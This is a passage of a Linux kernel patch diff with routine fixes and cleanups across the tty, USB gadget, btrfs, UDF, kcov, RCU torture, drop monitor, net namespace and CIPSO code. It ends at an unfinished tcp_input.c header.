++++ b/drivers/tty/vt/vt.c
+@@ -3440,6 +3440,15 @@ static void con_cleanup(struct tty_struct *tty)
+ 	tty_port_put(&vc->port);
+ }
+ 
++/*
++ * We can't deal with anything but the N_TTY ldisc,
++ * because we can sleep in our write() routine.
++ */
++static int con_ldisc_ok(struct tty_struct *tty, int ldisc)
++{
++	return ldisc == N_TTY ? 0 : -EINVAL;
++}
++
+ static int default_color           = 7; /* white */
+ static int default_italic_color    = 2; // green (ASCII)
+ static int default_underline_color = 3; // cyan (ASCII)
+@@ -3566,6 +3575,7 @@ static const struct tty_operations con_ops = {
+ 	.resize = vt_resize,
+ 	.shutdown = con_shutdown,
+ 	.cleanup = con_cleanup,
++	.ldisc_ok = con_ldisc_ok,
+ };
+ 
+ static struct cdev vc0_cdev;
+diff --git a/drivers/usb/dwc3/dwc3-pci.c b/drivers/usb/dwc3/dwc3-pci.c
+index ae25ee832ec03..6110ab1f91318 100644
+--- a/drivers/usb/dwc3/dwc3-pci.c
++++ b/drivers/usb/dwc3/dwc3-pci.c
+@@ -8,6 +8,7 @@
+  *	    Sebastian Andrzej Siewior <bigeasy@linutronix.de>
+  */
+ 
++#include <linux/dmi.h>
+ #include <linux/kernel.h>
+ #include <linux/module.h>
+ #include <linux/slab.h>
+@@ -219,6 +220,7 @@ static int dwc3_pci_quirks(struct dwc3_pci *dwc,
+ 
+ 		if (pdev->device == PCI_DEVICE_ID_INTEL_BYT) {
+ 			struct gpio_desc *gpio;
++			const char *bios_ver;
+ 			int ret;
+ 
+ 			/* On BYT the FW does not always enable the refclock */
+@@ -276,8 +278,12 @@ static int dwc3_pci_quirks(struct dwc3_pci *dwc,
+ 			 * detection. These can be identified by them _not_
+ 			 * using the standard ACPI battery and ac drivers.
+ 			 */
++			bios_ver = dmi_get_system_info(DMI_BIOS_VERSION);
+ 			if (acpi_dev_present("INT33FD", "1", 2) &&
+-			    acpi_quirk_skip_acpi_ac_and_battery()) {
++			    acpi_quirk_skip_acpi_ac_and_battery() &&
++			    /* Lenovo Yoga Tablet 2 Pro 1380 uses LC824206XA instead */
++			    !(bios_ver &&
++			      strstarts(bios_ver, "BLADE_21.X64.0005.R00.1504101516"))) {
+ 				dev_info(&pdev->dev, "Using TUSB1211 phy for charger detection\n");
+ 				swnode = &dwc3_pci_intel_phy_charger_detect_swnode;
+ 			}
+diff --git a/drivers/usb/gadget/function/f_hid.c b/drivers/usb/gadget/function/f_hid.c
+index f1ca9250cad96..bb558a575cb15 100644
+--- a/drivers/usb/gadget/function/f_hid.c
++++ b/drivers/usb/gadget/function/f_hid.c
+@@ -1025,9 +1025,9 @@ static inline int hidg_get_minor(void)
+ {
+ 	int ret;
+ 
+-	ret = ida_simple_get(&hidg_ida, 0, 0, GFP_KERNEL);
++	ret = ida_alloc(&hidg_ida, GFP_KERNEL);
+ 	if (ret >= HIDG_MINORS) {
+-		ida_simple_remove(&hidg_ida, ret);
++		ida_free(&hidg_ida, ret);
+ 		ret = -ENODEV;
+ 	}
+ 
+@@ -1172,7 +1172,7 @@ static const struct config_item_type hid_func_type = {
+ 
+ static inline void hidg_put_minor(int minor)
+ {
+-	ida_simple_remove(&hidg_ida, minor);
++	ida_free(&hidg_ida, minor);
+ }
+ 
+ static void hidg_free_inst(struct usb_function_instance *f)
+diff --git a/drivers/usb/gadget/function/f_printer.c b/drivers/usb/gadget/function/f_printer.c
+index a881c69b1f2bf..8545656419c71 100644
+--- a/drivers/usb/gadget/function/f_printer.c
++++ b/drivers/usb/gadget/function/f_printer.c
+@@ -1316,9 +1316,9 @@ static inline int gprinter_get_minor(void)
+ {
+ 	int ret;
+ 
+-	ret = ida_simple_get(&printer_ida, 0, 0, GFP_KERNEL);
++	ret = ida_alloc(&printer_ida, GFP_KERNEL);
+ 	if (ret >= PRINTER_MINORS) {
+-		ida_simple_remove(&printer_ida, ret);
++		ida_free(&printer_ida, ret);
+ 		ret = -ENODEV;
+ 	}
+ 
+@@ -1327,7 +1327,7 @@ static inline int gprinter_get_minor(void)
+ 
+ static inline void gprinter_put_minor(int minor)
+ {
+-	ida_simple_remove(&printer_ida, minor);
++	ida_free(&printer_ida, minor);
+ }
+ 
+ static int gprinter_setup(int);
+diff --git a/drivers/usb/gadget/function/rndis.c b/drivers/usb/gadget/function/rndis.c
+index 29bf8664bf582..12c5d9cf450c1 100644
+--- a/drivers/usb/gadget/function/rndis.c
++++ b/drivers/usb/gadget/function/rndis.c
+@@ -869,12 +869,12 @@ EXPORT_SYMBOL_GPL(rndis_msg_parser);
+ 
+ static inline int rndis_get_nr(void)
+ {
+-	return ida_simple_get(&rndis_ida, 0, 1000, GFP_KERNEL);
++	return ida_alloc_max(&rndis_ida, 999, GFP_KERNEL);
+ }
+ 
+ static inline void rndis_put_nr(int nr)
+ {
+-	ida_simple_remove(&rndis_ida, nr);
++	ida_free(&rndis_ida, nr);
+ }
+ 
+ struct rndis_params *rndis_register(void (*resp_avail)(void *v), void *v)
+diff --git a/drivers/usb/misc/uss720.c b/drivers/usb/misc/uss720.c
+index b00d92db5dfd1..eb5a8e0d9e2d6 100644
+--- a/drivers/usb/misc/uss720.c
++++ b/drivers/usb/misc/uss720.c
+@@ -677,7 +677,7 @@ static int uss720_probe(struct usb_interface *intf,
+ 	struct parport_uss720_private *priv;
+ 	struct parport *pp;
+ 	unsigned char reg;
+-	int i;
++	int ret;
+ 
+ 	dev_dbg(&intf->dev, "probe: vendor id 0x%x, device id 0x%x\n",
+ 		le16_to_cpu(usbdev->descriptor.idVendor),
+@@ -688,8 +688,8 @@ static int uss720_probe(struct usb_interface *intf,
+ 		usb_put_dev(usbdev);
+ 		return -ENODEV;
+ 	}
+-	i = usb_set_interface(usbdev, intf->altsetting->desc.bInterfaceNumber, 2);
+-	dev_dbg(&intf->dev, "set interface result %d\n", i);
++	ret = usb_set_interface(usbdev, intf->altsetting->desc.bInterfaceNumber, 2);
++	dev_dbg(&intf->dev, "set interface result %d\n", ret);
+ 
+ 	interface = intf->cur_altsetting;
+ 
+@@ -725,12 +725,18 @@ static int uss720_probe(struct usb_interface *intf,
+ 	set_1284_register(pp, 7, 0x00, GFP_KERNEL);
+ 	set_1284_register(pp, 6, 0x30, GFP_KERNEL);  /* PS/2 mode */
+ 	set_1284_register(pp, 2, 0x0c, GFP_KERNEL);
+-	/* debugging */
+-	get_1284_register(pp, 0, &reg, GFP_KERNEL);
++
++	/* The Belkin F5U002 Rev 2 P80453-B USB parallel port adapter shares the
++	 * device ID 050d:0002 with some other device that works with this
++	 * driver, but it itself does not. Detect and handle the bad cable
++	 * here. */
++	ret = get_1284_register(pp, 0, &reg, GFP_KERNEL);
+ 	dev_dbg(&intf->dev, "reg: %7ph\n", priv->reg);
++	if (ret < 0)
++		return ret;
+ 
+-	i = usb_find_last_int_in_endpoint(interface, &epd);
+-	if (!i) {
++	ret = usb_find_last_int_in_endpoint(interface, &epd);
++	if (!ret) {
+ 		dev_dbg(&intf->dev, "epaddr %d interval %d\n",
+ 				epd->bEndpointAddress, epd->bInterval);
+ 	}
+diff --git a/fs/btrfs/block-group.c b/fs/btrfs/block-group.c
+index 5993b627be580..77f24168c7ed2 100644
+--- a/fs/btrfs/block-group.c
++++ b/fs/btrfs/block-group.c
+@@ -1615,6 +1615,7 @@ void btrfs_reclaim_bgs_work(struct work_struct *work)
+ 		container_of(work, struct btrfs_fs_info, reclaim_bgs_work);
+ 	struct btrfs_block_group *bg;
+ 	struct btrfs_space_info *space_info;
++	LIST_HEAD(retry_list);
+ 
+ 	if (!test_bit(BTRFS_FS_OPEN, &fs_info->flags))
+ 		return;
+@@ -1717,8 +1718,11 @@ void btrfs_reclaim_bgs_work(struct work_struct *work)
+ 		}
+ 
+ next:
+-		if (ret)
+-			btrfs_mark_bg_to_reclaim(bg);
++		if (ret) {
++			/* Refcount held by the reclaim_bgs list after splice. */
++			btrfs_get_block_group(bg);
++			list_add_tail(&bg->bg_list, &retry_list);
++		}
+ 		btrfs_put_block_group(bg);
+ 
+ 		mutex_unlock(&fs_info->reclaim_bgs_lock);
+@@ -1738,6 +1742,9 @@ void btrfs_reclaim_bgs_work(struct work_struct *work)
+ 	spin_unlock(&fs_info->unused_bgs_lock);
+ 	mutex_unlock(&fs_info->reclaim_bgs_lock);
+ end:
++	spin_lock(&fs_info->unused_bgs_lock);
++	list_splice_tail(&retry_list, &fs_info->reclaim_bgs);
++	spin_unlock(&fs_info->unused_bgs_lock);
+ 	btrfs_exclop_finish(fs_info);
+ 	sb_end_write(fs_info->sb);
+ }
+diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c
+index c529ce5d986cc..f496622921843 100644
+--- a/fs/f2fs/super.c
++++ b/fs/f2fs/super.c
+@@ -2092,8 +2092,6 @@ static void default_options(struct f2fs_sb_info *sbi)
+ 	F2FS_OPTION(sbi).bggc_mode = BGGC_MODE_ON;
+ 	F2FS_OPTION(sbi).memory_mode = MEMORY_MODE_NORMAL;
+ 
+-	sbi->sb->s_flags &= ~SB_INLINECRYPT;
+-
+ 	set_opt(sbi, INLINE_XATTR);
+ 	set_opt(sbi, INLINE_DATA);
+ 	set_opt(sbi, INLINE_DENTRY);
+diff --git a/fs/smb/client/cifsfs.c b/fs/smb/client/cifsfs.c
+index f0a3336ffb6c8..13d038a96a5c0 100644
+--- a/fs/smb/client/cifsfs.c
++++ b/fs/smb/client/cifsfs.c
+@@ -128,7 +128,7 @@ module_param(enable_oplocks, bool, 0644);
+ MODULE_PARM_DESC(enable_oplocks, "Enable or disable oplocks. Default: y/Y/1");
+ 
+ module_param(enable_gcm_256, bool, 0644);
+-MODULE_PARM_DESC(enable_gcm_256, "Enable requesting strongest (256 bit) GCM encryption. Default: n/N/0");
++MODULE_PARM_DESC(enable_gcm_256, "Enable requesting strongest (256 bit) GCM encryption. Default: y/Y/0");
+ 
+ module_param(require_gcm_256, bool, 0644);
+ MODULE_PARM_DESC(require_gcm_256, "Require strongest (256 bit) GCM encryption. Default: n/N/0");
+diff --git a/fs/udf/udftime.c b/fs/udf/udftime.c
+index fce4ad976c8c2..26169b1f482c3 100644
+--- a/fs/udf/udftime.c
++++ b/fs/udf/udftime.c
+@@ -60,13 +60,18 @@ udf_disk_stamp_to_time(struct timespec64 *dest, struct timestamp src)
+ 	dest->tv_sec = mktime64(year, src.month, src.day, src.hour, src.minute,
+ 			src.second);
+ 	dest->tv_sec -= offset * 60;
+-	dest->tv_nsec = 1000 * (src.centiseconds * 10000 +
+-			src.hundredsOfMicroseconds * 100 + src.microseconds);
++
+ 	/*
+ 	 * Sanitize nanosecond field since reportedly some filesystems are
+ 	 * recorded with bogus sub-second values.
+ 	 */
+-	dest->tv_nsec %= NSEC_PER_SEC;
++	if (src.centiseconds < 100 && src.hundredsOfMicroseconds < 100 &&
++	    src.microseconds < 100) {
++		dest->tv_nsec = 1000 * (src.centiseconds * 10000 +
++			src.hundredsOfMicroseconds * 100 + src.microseconds);
++	} else {
++		dest->tv_nsec = 0;
++	}
+ }
+ 
+ void
+diff --git a/include/linux/kcov.h b/include/linux/kcov.h
+index 55dc338f6bcdd..492af783eb9b4 100644
+--- a/include/linux/kcov.h
++++ b/include/linux/kcov.h
+@@ -21,6 +21,8 @@ enum kcov_mode {
+ 	KCOV_MODE_TRACE_PC = 2,
+ 	/* Collecting comparison operands mode. */
+ 	KCOV_MODE_TRACE_CMP = 3,
++	/* The process owns a KCOV remote reference. */
++	KCOV_MODE_REMOTE = 4,
+ };
+ 
+ #define KCOV_IN_CTXSW	(1 << 30)
+diff --git a/include/linux/mod_devicetable.h b/include/linux/mod_devicetable.h
+index 549590e9c644d..a18b7b43fbbbf 100644
+--- a/include/linux/mod_devicetable.h
++++ b/include/linux/mod_devicetable.h
+@@ -676,6 +676,8 @@ struct x86_cpu_id {
+ 	__u16 model;
+ 	__u16 steppings;
+ 	__u16 feature;	/* bit index */
++	/* Solely for kernel-internal use: DO NOT EXPORT to userspace! */
++	__u16 flags;
+ 	kernel_ulong_t driver_data;
+ };
+ 
+diff --git a/include/linux/tty_driver.h b/include/linux/tty_driver.h
+index e00034118c7bc..1df868130adce 100644
+--- a/include/linux/tty_driver.h
++++ b/include/linux/tty_driver.h
+@@ -155,6 +155,13 @@ struct serial_struct;
+  *
+  *	Optional. Called under the @tty->termios_rwsem. May sleep.
+  *
++ * @ldisc_ok: ``int ()(struct tty_struct *tty, int ldisc)``
++ *
++ *	This routine allows the @tty driver to decide if it can deal
++ *	with a particular @ldisc.
++ *
++ *	Optional. Called under the @tty->ldisc_sem and @tty->termios_rwsem.
++ *
+  * @set_ldisc: ``void ()(struct tty_struct *tty)``
+  *
+  *	This routine allows the @tty driver to be notified when the device's
+@@ -374,6 +381,7 @@ struct tty_operations {
+ 	void (*hangup)(struct tty_struct *tty);
+ 	int (*break_ctl)(struct tty_struct *tty, int state);
+ 	void (*flush_buffer)(struct tty_struct *tty);
++	int (*ldisc_ok)(struct tty_struct *tty, int ldisc);
+ 	void (*set_ldisc)(struct tty_struct *tty);
+ 	void (*wait_until_sent)(struct tty_struct *tty, int timeout);
+ 	void (*send_xchar)(struct tty_struct *tty, char ch);
+diff --git a/include/net/sch_generic.h b/include/net/sch_generic.h
+index b3e3128402961..aefdb080ad3d2 100644
+--- a/include/net/sch_generic.h
++++ b/include/net/sch_generic.h
+@@ -126,6 +126,7 @@ struct Qdisc {
+ 
+ 	struct rcu_head		rcu;
+ 	netdevice_tracker	dev_tracker;
++	struct lock_class_key	root_lock_key;
+ 	/* private data */
+ 	long privdata[] ____cacheline_aligned;
+ };
+diff --git a/io_uring/sqpoll.c b/io_uring/sqpoll.c
+index 7b6facf529b8d..11610a70573ab 100644
+--- a/io_uring/sqpoll.c
++++ b/io_uring/sqpoll.c
+@@ -235,6 +235,14 @@ static int io_sq_thread(void *data)
+ 		set_cpus_allowed_ptr(current, cpu_online_mask);
+ 	current->flags |= PF_NO_SETAFFINITY;
+ 
++	/*
++	 * Force audit context to get setup, in case we do prep side async
++	 * operations that would trigger an audit call before any issue side
++	 * audit has been done.
++	 */
++	audit_uring_entry(IORING_OP_NOP);
++	audit_uring_exit(true, 0);
++
+ 	mutex_lock(&sqd->lock);
+ 	while (1) {
+ 		bool cap_entries, sqt_spin = false;
+diff --git a/kernel/gcov/gcc_4_7.c b/kernel/gcov/gcc_4_7.c
+index 74a4ef1da9ad7..fd75b4a484d76 100644
+--- a/kernel/gcov/gcc_4_7.c
++++ b/kernel/gcov/gcc_4_7.c
+@@ -18,7 +18,9 @@
+ #include <linux/mm.h>
+ #include "gcov.h"
+ 
+-#if (__GNUC__ >= 10)
++#if (__GNUC__ >= 14)
++#define GCOV_COUNTERS			9
++#elif (__GNUC__ >= 10)
+ #define GCOV_COUNTERS			8
+ #elif (__GNUC__ >= 7)
+ #define GCOV_COUNTERS			9
+diff --git a/kernel/gen_kheaders.sh b/kernel/gen_kheaders.sh
+index 473036b43c832..12bcd08fe79d4 100755
+--- a/kernel/gen_kheaders.sh
++++ b/kernel/gen_kheaders.sh
+@@ -81,12 +81,9 @@ find $cpio_dir -type f -print0 |
+ 	xargs -0 -P8 -n1 perl -pi -e 'BEGIN {undef $/;}; s/\/\*((?!SPDX).)*?\*\///smg;'
+ 
+ # Create archive and try to normalize metadata for reproducibility.
+-# For compatibility with older versions of tar, files are fed to tar
+-# pre-sorted, as --sort=name might not be available.
+-find $cpio_dir -printf "./%P\n" | LC_ALL=C sort | \
+-    tar "${KBUILD_BUILD_TIMESTAMP:+--mtime=$KBUILD_BUILD_TIMESTAMP}" \
+-    --owner=0 --group=0 --numeric-owner --no-recursion \
+-    -I $XZ -cf $tarfile -C $cpio_dir/ -T - > /dev/null
++tar "${KBUILD_BUILD_TIMESTAMP:+--mtime=$KBUILD_BUILD_TIMESTAMP}" \
++    --owner=0 --group=0 --sort=name --numeric-owner --mode=u=rw,go=r,a+X \
++    -I $XZ -cf $tarfile -C $cpio_dir/ . > /dev/null
+ 
+ echo $headers_md5 > kernel/kheaders.md5
+ echo "$this_file_md5" >> kernel/kheaders.md5
+diff --git a/kernel/kcov.c b/kernel/kcov.c
+index e5cd09fd8a050..fe3308dfd6a73 100644
+--- a/kernel/kcov.c
++++ b/kernel/kcov.c
+@@ -630,6 +630,7 @@ static int kcov_ioctl_locked(struct kcov *kcov, unsigned int cmd,
+ 			return -EINVAL;
+ 		kcov->mode = mode;
+ 		t->kcov = kcov;
++	        t->kcov_mode = KCOV_MODE_REMOTE;
+ 		kcov->t = t;
+ 		kcov->remote = true;
+ 		kcov->remote_size = remote_arg->area_size;
+diff --git a/kernel/padata.c b/kernel/padata.c
+index 7bef7dae3db54..0261bced7eb6e 100644
+--- a/kernel/padata.c
++++ b/kernel/padata.c
+@@ -98,7 +98,7 @@ static int __init padata_work_alloc_mt(int nworks, void *data,
+ {
+ 	int i;
+ 
+-	spin_lock(&padata_works_lock);
++	spin_lock_bh(&padata_works_lock);
+ 	/* Start at 1 because the current task participates in the job. */
+ 	for (i = 1; i < nworks; ++i) {
+ 		struct padata_work *pw = padata_work_alloc();
+@@ -108,7 +108,7 @@ static int __init padata_work_alloc_mt(int nworks, void *data,
+ 		padata_work_init(pw, padata_mt_helper, data, 0);
+ 		list_add(&pw->pw_list, head);
+ 	}
+-	spin_unlock(&padata_works_lock);
++	spin_unlock_bh(&padata_works_lock);
+ 
+ 	return i;
+ }
+@@ -126,12 +126,12 @@ static void __init padata_works_free(struct list_head *works)
+ 	if (list_empty(works))
+ 		return;
+ 
+-	spin_lock(&padata_works_lock);
++	spin_lock_bh(&padata_works_lock);
+ 	list_for_each_entry_safe(cur, next, works, pw_list) {
+ 		list_del(&cur->pw_list);
+ 		padata_work_free(cur);
+ 	}
+-	spin_unlock(&padata_works_lock);
++	spin_unlock_bh(&padata_works_lock);
+ }
+ 
+ static void padata_parallel_worker(struct work_struct *parallel_work)
+diff --git a/kernel/rcu/rcutorture.c b/kernel/rcu/rcutorture.c
+index 503c2aa845a4a..8c45df910763a 100644
+--- a/kernel/rcu/rcutorture.c
++++ b/kernel/rcu/rcutorture.c
+@@ -1946,7 +1946,8 @@ static bool rcu_torture_one_read(struct torture_random_state *trsp, long myid)
+ 	preempt_disable();
+ 	pipe_count = READ_ONCE(p->rtort_pipe_count);
+ 	if (pipe_count > RCU_TORTURE_PIPE_LEN) {
+-		/* Should not happen, but... */
++		// Should not happen in a correct RCU implementation,
++		// happens quite often for torture_type=busted.
+ 		pipe_count = RCU_TORTURE_PIPE_LEN;
+ 	}
+ 	completed = cur_ops->get_gp_seq();
+@@ -2418,8 +2419,8 @@ static int rcu_torture_stall(void *args)
+ 			preempt_disable();
+ 		pr_alert("%s start on CPU %d.\n",
+ 			  __func__, raw_smp_processor_id());
+-		while (ULONG_CMP_LT((unsigned long)ktime_get_seconds(),
+-				    stop_at))
++		while (ULONG_CMP_LT((unsigned long)ktime_get_seconds(), stop_at) &&
++		       !kthread_should_stop())
+ 			if (stall_cpu_block) {
+ #ifdef CONFIG_PREEMPTION
+ 				preempt_schedule();
+@@ -2967,11 +2968,12 @@ static void rcu_torture_barrier_cbf(struct rcu_head *rcu)
+ }
+ 
+ /* IPI handler to get callback posted on desired CPU, if online. */
+-static void rcu_torture_barrier1cb(void *rcu_void)
++static int rcu_torture_barrier1cb(void *rcu_void)
+ {
+ 	struct rcu_head *rhp = rcu_void;
+ 
+ 	cur_ops->call(rhp, rcu_torture_barrier_cbf);
++	return 0;
+ }
+ 
+ /* kthread function to register callbacks used to test RCU barriers. */
+@@ -2997,11 +2999,9 @@ static int rcu_torture_barrier_cbs(void *arg)
+ 		 * The above smp_load_acquire() ensures barrier_phase load
+ 		 * is ordered before the following ->call().
+ 		 */
+-		if (smp_call_function_single(myid, rcu_torture_barrier1cb,
+-					     &rcu, 1)) {
+-			// IPI failed, so use direct call from current CPU.
++		if (smp_call_on_cpu(myid, rcu_torture_barrier1cb, &rcu, 1))
+ 			cur_ops->call(&rcu, rcu_torture_barrier_cbf);
+-		}
++
+ 		if (atomic_dec_and_test(&barrier_cbs_count))
+ 			wake_up(&barrier_wq);
+ 	} while (!torture_must_stop());
+diff --git a/kernel/trace/Kconfig b/kernel/trace/Kconfig
+index 93d7249962833..e3a549239cb4e 100644
+--- a/kernel/trace/Kconfig
++++ b/kernel/trace/Kconfig
+@@ -1068,7 +1068,7 @@ config PREEMPTIRQ_DELAY_TEST
+ 
+ config SYNTH_EVENT_GEN_TEST
+ 	tristate "Test module for in-kernel synthetic event generation"
+-	depends on SYNTH_EVENTS
++	depends on SYNTH_EVENTS && m
+ 	help
+           This option creates a test module to check the base
+           functionality of in-kernel synthetic event definition and
+@@ -1081,7 +1081,7 @@ config SYNTH_EVENT_GEN_TEST
+ 
+ config KPROBE_EVENT_GEN_TEST
+ 	tristate "Test module for in-kernel kprobe event generation"
+-	depends on KPROBE_EVENTS
++	depends on KPROBE_EVENTS && m
+ 	help
+           This option creates a test module to check the base
+           functionality of in-kernel kprobe event definition.
+diff --git a/kernel/trace/preemptirq_delay_test.c b/kernel/trace/preemptirq_delay_test.c
+index 8c4ffd0761624..cb0871fbdb07f 100644
+--- a/kernel/trace/preemptirq_delay_test.c
++++ b/kernel/trace/preemptirq_delay_test.c
+@@ -215,4 +215,5 @@ static void __exit preemptirq_delay_exit(void)
+ 
+ module_init(preemptirq_delay_init)
+ module_exit(preemptirq_delay_exit)
++MODULE_DESCRIPTION("Preempt / IRQ disable delay thread to test latency tracers");
+ MODULE_LICENSE("GPL v2");
+diff --git a/mm/page_table_check.c b/mm/page_table_check.c
+index 4d05065376213..9392544d4754e 100644
+--- a/mm/page_table_check.c
++++ b/mm/page_table_check.c
+@@ -70,6 +70,9 @@ static void page_table_check_clear(struct mm_struct *mm, unsigned long addr,
+ 	page = pfn_to_page(pfn);
+ 	page_ext = page_ext_get(page);
+ 
++	if (!page_ext)
++		return;
++
+ 	BUG_ON(PageSlab(page));
+ 	anon = PageAnon(page);
+ 
+@@ -108,6 +111,9 @@ static void page_table_check_set(struct mm_struct *mm, unsigned long addr,
+ 	page = pfn_to_page(pfn);
+ 	page_ext = page_ext_get(page);
+ 
++	if (!page_ext)
++		return;
++
+ 	BUG_ON(PageSlab(page));
+ 	anon = PageAnon(page);
+ 
+@@ -138,7 +144,10 @@ void __page_table_check_zero(struct page *page, unsigned int order)
+ 	BUG_ON(PageSlab(page));
+ 
+ 	page_ext = page_ext_get(page);
+-	BUG_ON(!page_ext);
++
++	if (!page_ext)
++		return;
++
+ 	for (i = 0; i < (1ul << order); i++) {
+ 		struct page_table_check *ptc = get_page_table_check(page_ext);
+ 
+diff --git a/net/batman-adv/originator.c b/net/batman-adv/originator.c
+index 34903df4fe936..dafef3a78ad5d 100644
+--- a/net/batman-adv/originator.c
++++ b/net/batman-adv/originator.c
+@@ -1238,6 +1238,8 @@ void batadv_purge_orig_ref(struct batadv_priv *bat_priv)
+ 	/* for all origins... */
+ 	for (i = 0; i < hash->size; i++) {
+ 		head = &hash->table[i];
++		if (hlist_empty(head))
++			continue;
+ 		list_lock = &hash->list_locks[i];
+ 
+ 		spin_lock_bh(list_lock);
+diff --git a/net/core/drop_monitor.c b/net/core/drop_monitor.c
+index 8e0a90b45df22..522657b597d9f 100644
+--- a/net/core/drop_monitor.c
++++ b/net/core/drop_monitor.c
+@@ -72,7 +72,7 @@ struct net_dm_hw_entries {
+ };
+ 
+ struct per_cpu_dm_data {
+-	spinlock_t		lock;	/* Protects 'skb', 'hw_entries' and
++	raw_spinlock_t		lock;	/* Protects 'skb', 'hw_entries' and
+ 					 * 'send_timer'
+ 					 */
+ 	union {
+@@ -166,9 +166,9 @@ static struct sk_buff *reset_per_cpu_data(struct per_cpu_dm_data *data)
+ err:
+ 	mod_timer(&data->send_timer, jiffies + HZ / 10);
+ out:
+-	spin_lock_irqsave(&data->lock, flags);
++	raw_spin_lock_irqsave(&data->lock, flags);
+ 	swap(data->skb, skb);
+-	spin_unlock_irqrestore(&data->lock, flags);
++	raw_spin_unlock_irqrestore(&data->lock, flags);
+ 
+ 	if (skb) {
+ 		struct nlmsghdr *nlh = (struct nlmsghdr *)skb->data;
+@@ -223,7 +223,7 @@ static void trace_drop_common(struct sk_buff *skb, void *location)
+ 
+ 	local_irq_save(flags);
+ 	data = this_cpu_ptr(&dm_cpu_data);
+-	spin_lock(&data->lock);
++	raw_spin_lock(&data->lock);
+ 	dskb = data->skb;
+ 
+ 	if (!dskb)
+@@ -257,7 +257,7 @@ static void trace_drop_common(struct sk_buff *skb, void *location)
+ 	}
+ 
+ out:
+-	spin_unlock_irqrestore(&data->lock, flags);
++	raw_spin_unlock_irqrestore(&data->lock, flags);
+ }
+ 
+ static void trace_kfree_skb_hit(void *ignore, struct sk_buff *skb,
+@@ -312,9 +312,9 @@ net_dm_hw_reset_per_cpu_data(struct per_cpu_dm_data *hw_data)
+ 		mod_timer(&hw_data->send_timer, jiffies + HZ / 10);
+ 	}
+ 
+-	spin_lock_irqsave(&hw_data->lock, flags);
++	raw_spin_lock_irqsave(&hw_data->lock, flags);
+ 	swap(hw_data->hw_entries, hw_entries);
+-	spin_unlock_irqrestore(&hw_data->lock, flags);
++	raw_spin_unlock_irqrestore(&hw_data->lock, flags);
+ 
+ 	return hw_entries;
+ }
+@@ -446,7 +446,7 @@ net_dm_hw_trap_summary_probe(void *ignore, const struct devlink *devlink,
+ 		return;
+ 
+ 	hw_data = this_cpu_ptr(&dm_hw_cpu_data);
+-	spin_lock_irqsave(&hw_data->lock, flags);
++	raw_spin_lock_irqsave(&hw_data->lock, flags);
+ 	hw_entries = hw_data->hw_entries;
+ 
+ 	if (!hw_entries)
+@@ -475,7 +475,7 @@ net_dm_hw_trap_summary_probe(void *ignore, const struct devlink *devlink,
+ 	}
+ 
+ out:
+-	spin_unlock_irqrestore(&hw_data->lock, flags);
++	raw_spin_unlock_irqrestore(&hw_data->lock, flags);
+ }
+ 
+ static const struct net_dm_alert_ops net_dm_alert_summary_ops = {
+@@ -1658,7 +1658,7 @@ static struct notifier_block dropmon_net_notifier = {
+ 
+ static void __net_dm_cpu_data_init(struct per_cpu_dm_data *data)
+ {
+-	spin_lock_init(&data->lock);
++	raw_spin_lock_init(&data->lock);
+ 	skb_queue_head_init(&data->drop_queue);
+ 	u64_stats_init(&data->stats.syncp);
+ }
+diff --git a/net/core/filter.c b/net/core/filter.c
+index 1d8b271ef8cc2..7a07413913538 100644
+--- a/net/core/filter.c
++++ b/net/core/filter.c
+@@ -1655,6 +1655,11 @@ static DEFINE_PER_CPU(struct bpf_scratchpad, bpf_sp);
+ static inline int __bpf_try_make_writable(struct sk_buff *skb,
+ 					  unsigned int write_len)
+ {
++#ifdef CONFIG_DEBUG_NET
++	/* Avoid a splat in pskb_may_pull_reason() */
++	if (write_len > INT_MAX)
++		return -EINVAL;
++#endif
+ 	return skb_ensure_writable(skb, write_len);
+ }
+ 
+diff --git a/net/core/net_namespace.c b/net/core/net_namespace.c
+index c33930a171629..1d95a5adce4ec 100644
+--- a/net/core/net_namespace.c
++++ b/net/core/net_namespace.c
+@@ -657,11 +657,16 @@ EXPORT_SYMBOL_GPL(__put_net);
+  * get_net_ns - increment the refcount of the network namespace
+  * @ns: common namespace (net)
+  *
+- * Returns the net's common namespace.
++ * Returns the net's common namespace or ERR_PTR() if ref is zero.
+  */
+ struct ns_common *get_net_ns(struct ns_common *ns)
+ {
+-	return &get_net(container_of(ns, struct net, ns))->ns;
++	struct net *net;
++
++	net = maybe_get_net(container_of(ns, struct net, ns));
++	if (net)
++		return &net->ns;
++	return ERR_PTR(-EINVAL);
+ }
+ EXPORT_SYMBOL_GPL(get_net_ns);
+ 
+diff --git a/net/core/netpoll.c b/net/core/netpoll.c
+index 4ac8d0ad9f6fc..fd2195cfcb4aa 100644
+--- a/net/core/netpoll.c
++++ b/net/core/netpoll.c
+@@ -316,7 +316,7 @@ static int netpoll_owner_active(struct net_device *dev)
+ 	struct napi_struct *napi;
+ 
+ 	list_for_each_entry_rcu(napi, &dev->napi_list, dev_list) {
+-		if (napi->poll_owner == smp_processor_id())
++		if (READ_ONCE(napi->poll_owner) == smp_processor_id())
+ 			return 1;
+ 	}
+ 	return 0;
+diff --git a/net/core/sock.c b/net/core/sock.c
+index 48199e6e8f161..dce8f878f6385 100644
+--- a/net/core/sock.c
++++ b/net/core/sock.c
+@@ -3695,6 +3695,9 @@ void sk_common_release(struct sock *sk)
+ 
+ 	sk->sk_prot->unhash(sk);
+ 
++	if (sk->sk_socket)
++		sk->sk_socket->sk = NULL;
++
+ 	/*
+ 	 * In this point socket cannot receive new packets, but it is possible
+ 	 * that some packets are in flight because some CPU runs receiver and
+diff --git a/net/ipv4/cipso_ipv4.c b/net/ipv4/cipso_ipv4.c
+index 6cd3b6c559f05..2b56cabe4da98 100644
+--- a/net/ipv4/cipso_ipv4.c
++++ b/net/ipv4/cipso_ipv4.c
+@@ -2015,12 +2015,16 @@ static int cipso_v4_delopt(struct ip_options_rcu __rcu **opt_ptr)
+ 		 * from there we can determine the new total option length */
+ 		iter = 0;
+ 		optlen_new = 0;
+-		while (iter < opt->opt.optlen)
+-			if (opt->opt.__data[iter] != IPOPT_NOP) {
++		while (iter < opt->opt.optlen) {
++			if (opt->opt.__data[iter] == IPOPT_END) {
++				break;
++			} else if (opt->opt.__data[iter] == IPOPT_NOP) {
++				iter++;
++			} else {
+ 				iter += opt->opt.__data[iter + 1];
+ 				optlen_new = iter;
+-			} else
+-				iter++;
++			}
++		}
+ 		hdr_delta = opt->opt.optlen;
+ 		opt->opt.optlen = (optlen_new + 3) & ~3;
+ 		hdr_delta -= opt->opt.optlen;
+diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
